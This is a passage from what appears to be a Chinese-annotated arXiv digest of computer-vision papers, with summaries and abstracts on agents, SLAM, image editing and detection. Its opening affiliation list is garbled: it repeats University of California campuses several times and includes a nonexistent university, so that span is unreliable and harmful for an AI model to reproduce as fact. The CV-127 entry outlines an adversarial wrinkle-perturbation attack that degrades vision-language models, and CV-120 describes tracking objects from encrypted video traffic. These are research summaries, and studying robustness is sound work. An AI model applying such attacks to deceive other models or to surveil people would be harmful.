(田纳西大学); University of Kentucky (肯塔基大学); University of Alabama (阿拉巴马大学); University of Mississippi (密西西比大学); University of South Carolina (南卡罗来纳大学); University of North Dakota (北达科他大学); University of South Dakota (南达科他大学); University of Maine (缅因大学); University of Vermont (佛蒙特大学); University of New Hampshire (新罕布什尔大学); University of Rhode Island (罗德岛大学); University of Delaware (特拉华大学); University of Connecticut (康涅狄格大学); University of Massachusetts Amherst (马萨诸塞大学阿默斯特分校); University of New Jersey (新泽西大学); University of California, Los Angeles (加州大学洛杉矶分校); University of California, San Diego (加州大学圣地亚哥分校); University of California, Santa Barbara (加州大学圣塔芭芭拉分校); University of California, Davis (加州大学戴维斯分校); University of California, Irvine (加州大学欧文分校); University of California, San Francisco (加州大学旧金山分校); University of California, Merced (加州大学默塞德分校); University of California, Riverside (加州大学河滨分校); University of California, Santa Cruz (加州大学圣克鲁兹分校); University of California, Hastings College of the Law (加州大学哈斯廷斯法学院); University of California, Berkeley (加州大学伯克利分校); University of California, Davis (加州大学戴维斯分校); University of California, San Diego (加州大学圣地亚哥分校); University of California, Santa Barbara (加州大学圣塔芭芭拉分校); University of California, Los Angeles (加州大学洛杉矶分校); University of California, San Francisco (加州大学旧金山分校); University of California, Merced (加州大学默塞德分校); University of California, Riverside (加州大学河滨分校); University of California, Santa Cruz (加州大学圣克鲁兹分校); University of California, Hastings College of the Law (加州大学哈斯廷斯法学院); University of California, Berkeley (加州大学伯克利分校); University of California, Davis (加州大学戴维斯分校); University of California, San Diego (加州大学圣地亚哥分校); University of California, Santa Barbara (加州大学圣塔芭芭拉分校); University of California, Los Angeles (加州大学洛杉矶分校); University of California, San Francisco (加州大学旧金山分校); University of California, Merced (加州大学默塞德分校); University of California, Riverside (加州大学河滨分校); University of California, Santa Cruz (加州大学圣克鲁兹分校); University of California, Hastings College of the Law (加州大学哈斯廷斯法学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Research agents have recently achieved significant progress in information seeking and synthesis across heterogeneous textual and visual sources. In this paper, we introduce MuSEAgent, a multimodal reasoning agent that enhances decision-making by extending the capabilities of research agents to discover and leverage stateful experiences. Rather than relying on trajectory-level retrieval, we propose a stateful experience learning paradigm that abstracts interaction data into atomic decision experiences through hindsight reasoning. These experiences are organized into a quality-filtered experience bank that supports policy-driven experience retrieval at inference time. Specifically, MuSEAgent enables adaptive experience exploitation through complementary wide- and deep-search strategies, allowing the agent to dynamically retrieve multimodal guidance across diverse compositional semantic viewpoints. Extensive experiments demonstrate that MuSEAgent consistently outperforms strong trajectory-level experience retrieval baselines on both fine-grained visual perception and complex multimodal reasoning tasks. These results validate the effectiveness of stateful experience modeling in improving multimodal agent reasoning.
[CV-120] racking without Seeing: Geospatial Inference using Encrypted Traffic from Distributed Nodes
【速读】:该论文旨在解决在无法获取原始信号级传感数据的情况下,如何通过加密的报文级信息实现对动态环境中物体的精准地理空间跟踪问题。传统方法依赖于多分布式传感器的原始信号级信息融合,而本文提出了一种基于学习的框架GraySense,其关键在于利用无线视频传输中报文大小与场景动态之间的内在关联,从加密网络流量中提取间接感知信息,并结合可选的直接摄像头输入,通过双阶段架构(报文分组模块和基于Transformer的追踪模块)完成对象位置估计,从而在不访问原始流媒体的前提下实现了2.33米的欧氏距离跟踪误差,显著扩展了隐式信号在感知任务中的应用边界。
链接: https://arxiv.org/abs/2603.27811
作者: Sadik Yagiz Yetim,Gaofeng Dong,Isaac-Neil Zanoria,Ronit Barman,Maggie Wigness,Tarek Abdelzaher,Mani Srivastava,Suhas Diggavi
机构: University of California, Los Angeles (加州大学洛杉矶分校); DEVCOM Army Research Laboratory (美国陆军研究实验室); University of Illinois at Urbana-Champaign (伊利诺伊大学厄巴纳-香槟分校)
类目: Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG); Networking and Internet Architecture (cs.NI)
备注:
Abstract:Accurate observation of dynamic environments traditionally relies on synthesizing raw, signal-level information from multiple distributed sensors. This work investigates an alternative approach: performing geospatial inference using only encrypted packet-level information, without access to the raw sensory data. We further explore how this indirect information can be fused with directly available sensory data to extend overall inference capabilities. We introduce GraySense, a learning-based framework that performs geospatial object tracking by analyzing encrypted wireless video transmission traffic, such as packet sizes, from cameras with inaccessible streams. GraySense leverages the inherent relationship between scene dynamics and transmitted packet sizes to infer object motion. The framework consists of two stages: (1) a Packet Grouping module that identifies frame boundaries and estimates frame sizes from encrypted network traffic, and (2) a Tracker module, based on a Transformer encoder with a recurrent state, which fuses indirect packet-based inputs with optional direct camera-based inputs to estimate the object’s position. Extensive experiments with realistic videos from the CARLA simulator and emulated networks under varying conditions show that GraySense achieves 2.33 meters tracking error (Euclidean distance) without raw signal access, within the dimensions of tracked objects (4.61m x 1.93m). To our knowledge, this capability has not been previously demonstrated, expanding the use of latent signals for sensing.
[CV-121] Engineering Mythology: A Digital-Physical Framework for Culturally-Inspired Public Art
【速读】:该论文旨在解决跨学科、跨地域协作在大型公共艺术项目中面临的系统性挑战,特别是如何将文化传承(如印度奥里萨邦的神话叙事)、手工技艺与数字技术(如生成式设计、数字孪生和分布式制造)高效整合,并实现从设计到现场组装的一体化流程。其解决方案的关键在于构建一个融合数字-物理工作流(digital-physical workflow):通过数字建模与参数化优化确保结构可行性,利用本地工匠(Odisha artisans)进行分布式制造以保留文化特色,借助摄影测量与数字孪生实现迭代反馈与精度控制,并最终在黑岩沙漠一次性完成模块化装配,从而验证了多知识体系(包括工艺实践、结构工程、神话叙事与环境约束)协同运作的可行性,为未来STEAM教育、文化遗产保护与公共艺术的交叉项目提供了可复用的方法论框架。
链接: https://arxiv.org/abs/2603.27801
作者: Jnaneshwar Das,Christopher Filkins,Rajesh Moharana,Ekadashi Barik,Bishweshwar Das,David Ayers,Christopher Skiba,Rodney Staggers Jr,Mark Dill,Swig Miller,Daniel Tulberg,Patrick Smith,Seth Brink,Kyle Breen,Harish Anand,Ramon Arrowsmith
机构: Earth Innovation Hub (地球创新中心); Devi Art Foundation (德维艺术基金会); Arizona State University (亚利桑那州立大学)
类目: Graphics (cs.GR); Computer Vision and Pattern Recognition (cs.CV); Computers and Society (cs.CY); Robotics (cs.RO)
备注: 19 pages, 28 figures, 4 tables
Abstract:Navagunjara Reborn: The Phoenix of Odisha was built for Burning Man 2025 as both a sculpture and an experiment-a fusion of myth, craft, and computation. This paper describes the digital-physical workflow developed for the project: a pipeline that linked digital sculpting, distributed fabrication by artisans in Odisha (India), modular structural optimization in the U.S., iterative feedback through photogrammetry and digital twins, and finally, one-shot full assembly at the art site in Black Rock Desert, Nevada. The desert installation tested not just materials, but also systems of collaboration: between artisans and engineers, between myth and technology, between cultural specificity and global experimentation. We share the lessons learned in design, fabrication, and deployment and offer a framework for future interdisciplinary projects at the intersection of cultural heritage, STEAM education, and public art. In retrospect, this workflow can be read as a convergence of many knowledge systems-artisan practice, structural engineering, mythic narrative, and environmental constraint-rather than as execution of a single fixed blueprint.
[CV-122] Diversity Matters: Dataset Diversification and Dual-Branch Network for Generalized AI-Generated Image Detection
【速读】:该论文旨在解决AI生成图像(AI-generated images)检测在跨模型和跨数据集场景下的泛化能力不足问题,尤其针对生成对抗网络(GANs)、扩散模型等多样化的生成技术所导致的检测鲁棒性差这一挑战。解决方案的关键在于提出一个名为“Diversity Matters”的新框架,其核心创新包括:(1)引入特征域相似性过滤机制,通过剔除类别间与类别内高度冗余的样本,提升训练数据的多样性与代表性;(2)设计双分支网络结构,融合像素域与频域的CLIP特征,协同捕捉语义信息与结构特征,从而增强对未见生成模型及对抗条件下的检测性能。该方法显著提升了跨模型与跨数据集的检测效果,验证了数据多样性与特征域互补性对构建可靠检测器的重要性。
链接: https://arxiv.org/abs/2603.27800
作者: Nusrat Tasnim,Kutub Uddin,Khalid Malik
机构: Korea Aerospace University (韩国航空航天大学); University of Michigan-Flint (密歇根大学弗林特分校)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The rapid proliferation of AI-generated images, powered by generative adversarial networks (GANs), diffusion models, and other synthesis techniques, has raised serious concerns about misinformation, copyright violations, and digital security. However, detecting such images in a generalized and robust manner remains a major challenge due to the vast diversity of generative models and data distributions. In this work, we present \textbfDiversity Matters, a novel framework that emphasizes data diversity and feature domain complementarity for AI-generated image detection. The proposed method introduces a feature-domain similarity filtering mechanism that discards redundant or highly similar samples across both inter-class and intra-class distributions, ensuring a more diverse and representative training set. Furthermore, we propose a dual-branch network that combines CLIP features from the pixel domain and the frequency domain to jointly capture semantic and structural cues, leading to improved generalization against unseen generative models and adversarial conditions. Extensive experiments on benchmark datasets demonstrate that the proposed approach significantly improves cross-model and cross-dataset performance compared to existing methods. \textbfDiversity Matters highlights the critical role of data and feature diversity in building reliable and robust detectors against the rapidly evolving landscape of synthetic content.
[CV-123] Inference-time Trajectory Optimization for Manga Image Editing
【速读】:该论文旨在解决预训练图像编辑模型在漫画(manga)图像上表现不佳的问题,这是因为现有模型主要基于自然图像数据训练,而直接对大规模模型进行再训练或微调以适配漫画数据在计算成本和版权方面均不可行。其解决方案的关键在于提出一种推理时自适应方法(inference-time adaptation),仅利用输入的漫画图像本身,在推理阶段微调生成轨迹,使模型在空提示(empty prompt)下能更忠实重建输入图像,从而实现无需额外标注或训练即可提升对漫画图像的编辑效果,且计算开销极低。
链接: https://arxiv.org/abs/2603.27790
作者: Ryosuke Furuta
机构: Mantra Inc.(Mantra公司); The University of Tokyo(东京大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:We present an inference-time adaptation method that tailors a pretrained image editing model to each input manga image using only the input image itself. Despite recent progress in pretrained image editing, such models often underperform on manga because they are trained predominantly on natural-image data. Re-training or fine-tuning large-scale models on manga is, however, generally impractical due to both computational cost and copyright constraints. To address this issue, our method slightly corrects the generation trajectory at inference time so that the input image can be reconstructed more faithfully under an empty prompt. Experimental results show that our method consistently outperforms existing baselines while incurring only negligible computational overhead.
[CV-124] GS3LAM: Gaussian Semantic Splatting SLAM ACM-MM2024
【速读】:该论文旨在解决现有语义SLAM(Semantic SLAM)系统在构建一致、稠密且实时的语义地图时面临的挑战,尤其是显式表示方法受限于分辨率和未知区域预测能力不足,而隐式表示方法则因依赖耗时的射线追踪难以满足实时性要求。其解决方案的关键在于提出GS3LAM框架,该框架将场景建模为语义高斯场(Semantic Gaussian Field, SG-Field),通过多模态误差约束联合优化相机位姿与场结构,并引入深度自适应尺度正则化(Depth-adaptive Scale Regularization, DSR)以校正尺度不变高斯与几何表面间的错位问题;同时采用基于随机采样的关键帧映射策略(Random Sampling-based Keyframe Mapping, RSKM)有效缓解灾难性遗忘,从而实现高效、鲁棒且高质量的实时语义重建。
链接: https://arxiv.org/abs/2603.27781
作者: Linfei Li,Lin Zhang,Zhong Wang,Ying Shen
机构: Tongji University (同济大学); Shanghai Jiaotong University (上海交通大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by ACM MM 2024
Abstract:Recently, the multi-modal fusion of RGB, depth, and semantics has shown great potential in dense Simultaneous Localization and Mapping (SLAM). However, a prerequisite for generating consistent semantic maps is the availability of dense, efficient, and scalable scene representations. Existing semantic SLAM systems based on explicit representations are often limited by resolution and an inability to predict unknown areas. Conversely, implicit representations typically rely on time-consuming ray tracing, failing to meet real-time requirements. Fortunately, 3D Gaussian Splatting (3DGS) has emerged as a promising representation that combines the efficiency of point-based methods with the continuity of geometric structures. To this end, we propose GS3LAM, a Gaussian Semantic Splatting SLAM framework that processes multimodal data to render consistent, dense semantic maps in real-time. GS3LAM models the scene as a Semantic Gaussian Field (SG-Field) and jointly optimizes camera poses and the field via multimodal error constraints. Furthermore, a Depth-adaptive Scale Regularization (DSR) scheme is introduced to resolve misalignments between scale-invariant Gaussians and geometric surfaces. To mitigate catastrophic forgetting, we propose a Random Sampling-based Keyframe Mapping (RSKM) strategy, which demonstrates superior performance over common local covisibility optimization methods. Extensive experiments on benchmark datasets show that GS3LAM achieves increased tracking robustness, superior rendering quality, and enhanced semantic precision compared to state-of-the-art methods. Source code is available at this https URL.
[CV-125] Exploring Student Perception on Gen AI Adoption in Higher Education: A Descriptive Study
【速读】:该论文旨在解决高等教育中生成式人工智能(Generative Artificial Intelligence, GenAI)应用过程中学生视角的缺失问题,即当前关于GenAI在教学与评估中的整合研究多聚焦于机构和教师立场,而对学生如何感知、使用及评价GenAI在学术实践中的作用缺乏系统探讨。其解决方案的关键在于提出一种以教学法为导向的框架:强调将AI素养(AI literacy)纳入课程体系,提供伦理指导,并确保学生对AI工具的公平获取,从而推动高校从单纯监管转向赋能式管理,促进GenAI在学术场景中的负责任且有效的应用。
链接: https://arxiv.org/abs/2603.27777
作者: Harpreet Singh,Jaspreet Singh,Satwant Singh,Rupinder Singh,Shamim Ibne Shahid,Mohammad Hassan,Tayarani Najaran
机构: 未知
类目: Computers and Society (cs.CY); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The rapid proliferation of Generative Artificial Intelligence (GenAI) is reshaping pedagogical practices and assessment models in higher education. While institutional and educator perspectives on GenAI integration are increasingly documented, the student perspective remains comparatively underexplored. This study examines how students perceive, use, and evaluate GenAI within their academic practices, focusing on usage patterns, perceived benefits, and expectations for institutional support. Data were collected through a questionnaire administered to 436 postgraduate Computer Science students at the University of Hertfordshire and analysed using descriptive methods. The findings reveal a Confidence-Competence Paradox: although more than 60% of students report high familiarity with tools such as ChatGPT, daily academic use remains limited and confidence in effective application is only moderate. Students primarily employ GenAI for cognitive scaffolding tasks, including concept clarification and brainstorming, rather than fully automated content generation. At the same time, respondents express concerns regarding data privacy, reliability of AI-generated information, and the potential erosion of critical thinking skills. The results also indicate strong student support for integrating AI literacy into curricula and programme Knowledge, Skills, and Behaviours (KSBs). Overall, the study suggests that universities should move beyond a policing approach to GenAI and adopt a pedagogical framework that emphasises AI literacy, ethical guidance, and equitable access to AI tools.
[CV-126] RINO: Rotation-Invariant Non-Rigid Correspondences CVPR
【速读】:该论文旨在解决密集三维形状对应(Dense 3D Shape Correspondence)问题,尤其是在非等距形变(non-isometric deformations)、部分数据(partial data)和非流形输入(non-manifold inputs)等复杂场景下,现有深度学习方法因依赖中间几何特征或手工设计描述符而导致性能受限的问题。解决方案的关键在于提出一种无监督、旋转不变的密集对应框架 RINO,其核心是 RINONet——一种结合向量基 SO(3)-不变学习与方向感知复函数映射(orientation-aware complex functional maps)的特征提取器,能够直接从原始几何数据中学习鲁棒特征,从而实现无需形状预对齐或手工特征的端到端数据驱动匹配。
链接: https://arxiv.org/abs/2603.27773
作者: Maolin Gao,Shao Jie Hu-Chen,Congyue Deng,Riccardo Marin,Leonidas Guibas,Daniel Cremers
机构: TUM; Stanford University; MCML; MIT
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 17 pages, 36 Figures, Computer Vision and Pattern Recognition (CVPR) 2026
Abstract:Dense 3D shape correspondence remains a central challenge in computer vision and graphics as many deep learning approaches still rely on intermediate geometric features or handcrafted descriptors, limiting their effectiveness under non-isometric deformations, partial data, and non-manifold inputs. To overcome these issues, we introduce RINO, an unsupervised, rotation-invariant dense correspondence framework that effectively unifies rigid and non-rigid shape matching. The core of our method is the novel RINONet, a feature extractor that integrates vector-based SO(3)-invariant learning with orientation-aware complex functional maps to extract robust features directly from raw geometry. This allows for a fully end-to-end, data-driven approach that bypasses the need for shape pre-alignment or handcrafted features. Extensive experiments show unprecedented performance of RINO across challenging non-rigid matching tasks, including arbitrary poses, non-isometry, partiality, non-manifoldness, and noise.
[CV-127] When Surfaces Lie: Exploiting Wrinkle-Induced Attention Shift to Attack Vision-Language Models
【速读】:该论文旨在解决视觉-语言模型(Visual-Language Models, VLMs)在面对物理上合理但非刚性形变(如柔性表面褶皱)时的鲁棒性不足问题。现有研究多关注于图像分类等任务,而对真实世界中常见的非刚性变形导致的性能退化缺乏系统评估与应对策略。其解决方案的关键在于提出一种受三维织物褶皱力学启发的参数化结构扰动方法:通过构建多尺度褶皱场,并结合位移场畸变与表面一致性外观变化,生成逼真的非刚性扰动;同时设计低维参数空间中的分层适应度函数并采用优化搜索策略,在视觉自然性与对抗有效性之间取得平衡,从而显著降低多种先进VLMs在零样本分类、图像描述和视觉问答等任务上的性能表现,验证了该方法的有效性和迁移能力。
链接: https://arxiv.org/abs/2603.27759
作者: Chengyin Hu,Xuemeng Sun,Jiajun Han,Qike Zhang,Xiang Chen,Xin Wang,Yiwei Wei,Jiahua Long
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Visual-Language Models (VLMs) have demonstrated exceptional cross-modal understanding across various tasks, including zero-shot classification, image captioning, and visual question answering. However, their robustness to physically plausible non-rigid deformations-such as wrinkles on flexible surfaces-remains poorly understood. In this work, we propose a parametric structural perturbation method inspired by the mechanics of three-dimensional fabric wrinkles. Specifically, our method generates photorealistic non-rigid perturbations by constructing multi-scale wrinkle fields and integrating displacement field distortion with surface-consistent appearance variations. To achieve an optimal balance between visual naturalness and adversarial effectiveness, we design a hierarchical fitness function in a low-dimensional parameter space and employ an optimization-based search strategy. We evaluate our approach using a two-stage framework: perturbations are first optimized on a zero-shot classification proxy task and subsequently assessed for transferability on generative tasks. Experimental results demonstrate that our method significantly degrades the performance of various state-of-the-art VLMs, consistently outperforming baselines in both image captioning and visual question-answering tasks.
[CV-128] RHO: Robust Holistic OSM-Based Metric Cross-View Geo-Localization CVPR2026
【速读】:该论文旨在解决跨视角地理定位(Cross-View Geo-Localization, CVGL)中因传感器噪声、天气变化和光照差异导致的定位精度下降问题,尤其针对传统基于针孔相机与卫星图像的方法在复杂环境下的鲁棒性不足。其解决方案的关键在于提出一个名为RHO的双分支Pin-Pan架构模型,并引入Split-Undistort-Merge(SUM)模块以校正全景图的畸变,以及Position-Orientation Fusion(POF)机制以融合位置与方向信息,从而提升在真实世界多变条件下的视觉定位准确性。同时,作者构建了大规模基准数据集CV-RHO,包含超过270万张不同气象和光照条件下带传感器噪声的全景图,为研究提供了高质量的数据支撑。
链接: https://arxiv.org/abs/2603.27758
作者: Junwei Zheng,Ruize Dai,Ruiping Liu,Zichao Zeng,Yufan Chen,Fangjinhua Wang,Kunyu Peng,Kailun Yang,Jiaming Zhang,Rainer Stiefelhagen
机构: Karlsruhe Institute of Technology (卡尔斯鲁厄理工学院); Hunan University (湖南大学); ETH Zurich (苏黎世联邦理工学院); UCL (伦敦大学学院); INSAIT (INSAIT)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by CVPR 2026. Project page: this https URL
Abstract:Metric Cross-View Geo-Localization (MCVGL) aims to estimate the 3-DoF camera pose (position and heading) by matching ground and satellite images. In this work, instead of pinhole and satellite images, we study robust MCVGL using holistic panoramas and OpenStreetMap (OSM). To this end, we establish a large-scale MCVGL benchmark dataset, CV-RHO, with over 2.7M images under different weather and lighting conditions, as well as sensor noise. Furthermore, we propose a model termed RHO with a two-branch Pin-Pan architecture for accurate visual localization. A Split-Undistort-Merge (SUM) module is introduced to address the panoramic distortion, and a Position-Orientation Fusion (POF) mechanism is designed to enhance the localization accuracy. Extensive experiments prove the value of our CV-RHO dataset and the effectiveness of the RHO model, with a significant performance gain up to 20% compared with the state-of-the-art baselines. Project page: this https URL.
[CV-129] E-TIDE: Fast Structure-Preserving Motion Forecasting from Event Sequences
【速读】:该论文旨在解决基于事件的相机(event-based camera)在资源受限场景下进行未来事件表示预测的问题,该任务对下游应用如语义分割或目标跟踪至关重要。现有方法虽性能优异,但通常依赖计算复杂度高的骨干网络和大规模预训练,难以在低延迟、小内存的实时部署环境中使用。解决方案的关键在于提出一种轻量级端到端可训练架构 E-TIDE,其核心是 TIDE 模块(Temporal Interaction for Dynamic Events),通过大核混合(large-kernel mixing)与活动感知门控(activity-aware gating)机制,在保持低计算复杂度的同时高效建模稀疏事件张量的时空动态关系,从而实现高精度预测且显著降低模型规模与训练需求。
链接: https://arxiv.org/abs/2603.27757
作者: Biswadeep Sen,Benoit R. Cottereau,Nicolas Cuperlier,Terence Sim
机构: National University of Singapore (新加坡国立大学); IPAL CNRS IRL 2955 (IPAL CNRS IRL 2955); CerCo, CNRS UMR 5549, Université de Toulouse (CerCo, CNRS UMR 5549, 图卢兹大学); ETIS UMR8051, CY Cergy Paris Université, ENSEA, CNRS (ETIS UMR8051, CY Cergy巴黎大学, ENSEA, CNRS)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Event-based cameras capture visual information as asynchronous streams of per-pixel brightness changes, generating sparse, temporally precise data. Compared to conventional frame-based sensors, they offer significant advantages in capturing high-speed dynamics while consuming substantially less power. Predicting future event representations from past observations is an important problem, enabling downstream tasks such as future semantic segmentation or object tracking without requiring access to future sensor measurements. While recent state-of-the-art approaches achieve strong performance, they often rely on computationally heavy backbones and, in some cases, large-scale pretraining, limiting their applicability in resource-constrained scenarios. In this work, we introduce E-TIDE, a lightweight, end-to-end trainable architecture for event-tensor prediction that is designed to operate efficiently without large-scale pretraining. Our approach employs the TIDE module (Temporal Interaction for Dynamic Events), motivated by efficient spatiotemporal interaction design for sparse event tensors, to capture temporal dependencies via large-kernel mixing and activity-aware gating while maintaining low computational complexity. Experiments on standard event-based datasets demonstrate that our method achieves competitive performance with significantly reduced model size and training requirements, making it well-suited for real-time deployment under tight latency and memory budgets.
[CV-130] AI-Powered Facial Mask Removal Is Not Suitable For Biometric Identification
【速读】:该论文旨在解决生成式 AI(Generative AI)在 crowd-sourced online criminal investigations 中用于面部去遮挡(facial unmasking)时所引发的可靠性与风险问题,特别是评估经 AI 处理后的图像是否能被可靠地匹配到真实身份。其解决方案的关键在于开展一项大规模实证分析,系统性地评估商业级 AI 面部去遮挡工具在真实场景下的识别准确率与潜在误判风险,从而为执法机构和公众提供关于此类技术应用边界与伦理规范的科学依据。
链接: https://arxiv.org/abs/2603.27747
作者: Emily A Cooper,Hany Farid
机构: University of California, Berkeley (加州大学伯克利分校)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Recently, crowd-sourced online criminal investigations have used generative-AI to enhance low-quality visual evidence. In one high-profile case, social-media users circulated an “AI-unmasked” image of a federal agent involved in a fatal shooting, fueling a wide-spread misidentification. In response to this and similar incidents, we conducted a large-scale analysis evaluating the efficacy and risks of commercial AI-powered facial unmasking, specifically assessing whether the resulting faces can be reliably matched to true identities.
[CV-131] Data Organization Matters in Multimodal Instruction Tuning: A Controlled Study of Capability Trade-offs
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在指令微调过程中,由于训练数据来自异构监督源且任务结构差异显著,其时间组织方式对模型在通用视觉理解、结构化推理与细粒度OCR/文档理解之间权衡的影响尚不明确的问题。解决方案的关键在于采用一个受控的三阶段训练框架,在保持模型架构、可训练模块及优化流程一致的前提下,仅改变后对齐阶段监督数据的时间排列顺序,系统比较四种数据调度策略:直接混合、课程学习(curriculum training)、平衡采样和逆向课程学习(reverse curriculum)。实验表明,课程学习在整体性能与结构化推理能力上表现最优,且训练动态分析揭示了先建立通用理解与推理能力再引入OCR密集型任务有助于优化过程更平稳、收敛更快,从而确立数据调度为多模态模型适配中的关键设计维度。
链接: https://arxiv.org/abs/2603.27744
作者: Guowei Tang
机构: East China Normal University (华东师范大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 12 pages, 2 figures
Abstract:Recent multimodal large language models (MLLMs) perform strongly on general visual understanding, diagram and chart reasoning, and document-centric perception. However, these abilities are learned from heterogeneous supervision sources with very different task structures and learning demands, and the effect of their temporal organization during training remains underexplored. We study whether data organization affects the trade-off among general understanding, structured reasoning, and fine-grained OCR/document understanding in multimodal instruction tuning. To isolate this factor, we use a controlled three-stage training framework in which the backbone, trainable modules, and optimization pipeline are fixed across all runs, and only the temporal arrangement of post-alignment supervision is changed. We compare four strategies: direct mixture, curriculum training, balanced sampling, and reverse curriculum. Experiments on general visual instruction following, diagram reasoning, chart reasoning, scene-text question answering, and document question answering show that data organization is a first-order design variable in multimodal adaptation. Curriculum training gives the best overall trade-off and the strongest structured reasoning performance. Balanced sampling is better for OCR-oriented capability but weakens the broader capability balance. Reverse curriculum performs worst in both final performance and optimization stability. Training-dynamics analysis further suggests that building general understanding and reasoning before introducing OCR-intensive supervision leads to smoother optimization and faster convergence. These findings highlight data scheduling as an explicit design dimension for multimodal model adaptation.
[CV-132] IR-Agent : Training an Explorative and Efficient Agent for Image Restoration
【速读】:该论文旨在解决现有视觉-语言图像修复(Image Restoration, IR)代理在无训练情况下依赖启发式任务调度和穷举工具遍历所导致的次优修复路径与高昂计算成本问题。其核心瓶颈在于缺乏一个可学习的决策策略,使得模型难以高效处理退化感知的任务排序与工具组合。解决方案的关键在于提出TIR-Agent,一个可通过两阶段训练(监督微调+SFT后强化学习RL)获得直接工具调用策略的可训练图像修复代理;其中,两个关键设计保障了有效RL训练:一是对SFT数据施加随机扰动以扩展策略在任务调度与工具组合上的探索空间,二是采用多维自适应奖励机制动态调整异构图像质量指标权重,从而缓解奖励黑客(reward hacking)问题。此外,为支持高吞吐量异步GPU工具调用,还构建了全局共享的模型调用池,显著提升了推理效率(超过2.5倍加速)。
链接: https://arxiv.org/abs/2603.27742
作者: Yisheng Zhang,Guoli Jia,Haote Hu,Shanxu Zhao,Kaikai Zhao,Long Sun,Xinwei Long,Kai Tian,Che Jiang,Zhaoxiang Liu,Kai Wang,Shiguo Lian,Kaiyan Zhang,Bowen Zhou
机构: Tsinghua University (清华大学); China Unicom (中国联通); Hunan University (湖南大学); Frontis.AI; Shanghai Artificial Intelligence Laboratory (上海人工智能实验室)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language agents that orchestrate specialized tools for image restoration (IR) have emerged as a promising method, yet most existing frameworks operate in a training-free manner. They rely on heuristic task scheduling and exhaustive tool traversal, resulting in sub-optimal restoration paths and prohibitive computational cost. We argue that the core bottleneck lies in the absence of a learned policy to make decision, as a vision-language model cannot efficiently handle degradation-aware task ordering and tool composition. To this end, we propose TIR-Agent, a trainable image restoration agent that performs a direct tool-calling policy through a two-stage training pipeline of supervised fine-tuning (SFT) followed by reinforcement learning (RL). Two key designs underpin effective RL training: (i) a random perturbation strategy applied to the SFT data, which broadens the policy’s exploration over task schedules and tool compositions, and (ii) a multi-dimensional adaptive reward mechanism that dynamically re-weights heterogeneous image quality metrics to mitigate reward hacking. To support high-throughput, asynchronous GPU-based tool invocation during training, we further develop a globally shared model-call pool. Experiments on both in-domain and out-of-domain degradations show that TIR-Agent outperforms 12 baselines, including 6 all-in-one models, 3 training-free agents, and 3 proprietary models, and achieves over 2.5 \times inference speedup by eliminating redundant tool executions.
[CV-133] Synergizing Discriminative Exemplars and Self-Refined Experience for MLLM -based In-Context Learning in Medical Diagnosis
【速读】:该论文旨在解决通用多模态大语言模型(Multimodal Large Language Models, MLLMs)在医学诊断中因缺乏领域特异性理解而导致性能不足的问题,同时避免传统微调方法所面临的专家标注成本高和计算开销大的局限。其解决方案的关键在于提出一种无需更新预训练模型权重的临床医生仿生工作流(Clinician Mimetic Workflow),该框架通过判别性示例核心集选择(Discriminative Exemplar Coreset Selection, DECS)模拟临床医生对“锚定病例”的参考能力,从噪声数据中选取判别性强的视觉核心子集;并结合自精炼经验总结机制(Self-Refined Experience Summarization, SRES),将多样化的推理路径动态归纳为文本形式的经验库(Experience Bank),从而实现高效且精准的参数无关型医疗领域内上下文学习(In-Context Learning, ICL)。
链接: https://arxiv.org/abs/2603.27737
作者: Wenkai Zhao,Zipei Wang,Mengjie Fang,Di Dong,Jie Tian,Lingwei Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:General Multimodal Large Language Models (MLLMs) often underperform in capturing domain-specific nuances in medical diagnosis, trailing behind fully supervised baselines. Although fine-tuning provides a remedy, the high costs of expert annotation and massive computational overhead limit its scalability. To bridge this gap without updating the weights of the pre-trained backbone of the MLLM, we propose a Clinician Mimetic Workflow. This is a novel In-Context Learning (ICL) framework designed to synergize Discriminative Exemplar Coreset Selection (DECS) and Self-Refined Experience Summarization (SRES). Specifically, DECS simulates a clinician’s ability to reference “anchor cases” by selecting discriminative visual coresets from noisy data at the computational level; meanwhile, SRES mimics the cognition and reflection in clinical diagnosis by distilling diverse rollouts into a dynamic textual Experience Bank. Extensive evaluation across all 12 datasets of the MedMNIST 2D benchmark demonstrates that our method outperforms zero-shot general and medical MLLMs. Simultaneously, it achieves performance levels comparable to fully supervised vision models and domain-specific fine-tuned MLLMs, setting a new benchmark for parameter-efficient medical in-context learning. Our code is available at an anonymous repository: this https URL.
[CV-134] Look Compare and Draw: Differential Query Transformer for Automatic Oil Painting
【速读】:该论文旨在解决自动油画生成中因重复和常见笔触导致的美学效果下降问题(即生成结果缺乏动态性和表现力)。其解决方案的关键在于引入差分图像分析(differential image analysis),并设计了差分查询Transformer(DQ-Transformer)架构,通过融合位置编码的差分图像表示来引导笔触预测过程,从而增强模型对局部细节的敏感性,实现更精细、更具艺术性的笔触生成。此外,结合对抗训练进一步提升笔触预测精度,显著改善合成画作的整体真实感与艺术一致性。
链接: https://arxiv.org/abs/2603.27720
作者: Lingyu Liu,Yaxiong Wang,Li Zhu,Lizi Liao,Zhedong Zheng
机构: Xi’an Jiaotong University (西安交通大学); Hefei University of Technology (合肥工业大学); Singapore Management University (新加坡管理大学); University of Macau (澳门大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Multimedia (cs.MM)
备注: this https URL
